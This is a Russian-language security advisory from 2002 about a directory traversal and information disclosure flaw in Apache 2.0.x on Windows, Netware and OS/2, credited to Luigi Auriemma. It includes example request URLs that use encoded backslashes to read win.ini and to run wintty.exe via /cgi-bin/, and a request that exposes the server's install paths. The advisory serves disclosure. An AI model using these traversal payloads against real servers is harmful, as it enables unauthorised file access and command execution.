Security Lab

Доступ к произвольным файлам и выполнение произвольных команд в apache 2.0.x

Дата публикации:17.08.2002
Всего просмотров:1228
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: В apache 2.0.x для Win/Netware/OS2 обнаружена возможность обхода каталога и раскрытие информации.
  1. Обход основного каталога:

    В apache не фильтруется символ '\' == %5c, который может использоваться как разделитель пути ((Windows, Netware, OS2 и другие). Уязвимость позволяет просмотреть содержание произвольных файлов и может использоваться для выполнения произвольных команд, через /cgi-bin/.

    Пример:

    1. Просматривает win.ini:
      http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

    2. Запускает утилиту wintty:
      http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELL

  2. Раскрытие информации:

    Некорректный запрос к несуществующему var файлу, раскроет некоторую информацию о Web сервере (физическое расположение, версия и т.п.). Пример:

    На запрос http://127.0.0.1/error/HTTP_NOT_FOUND.html.var

    Сервер ответит: 

    |Not Acceptable
|
|An appropriate representation of the requested resource 
|/error/HTTP_NOT_FOUND.html.var could not be 
found on this server. 
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/
HTTP_NOT_FOUND.html.var, type 
| text/html, language de
| * C:/server/Apache Group/Apache2/error/
HTTP_NOT_FOUND.html.var, type text/html, language en
| * C:/server/Apache Group/Apache2/error/
HTTP_NOT_FOUND.html.var, type text/html, language es
| * C:/server/Apache Group/Apache2/error/
HTTP_NOT_FOUND.html.var , type text/html, language fr
уязвимость обнаружена в 2.0.x до 2.0.39
Ссылки: Auriemma Luigi, PivX security advisory AL#001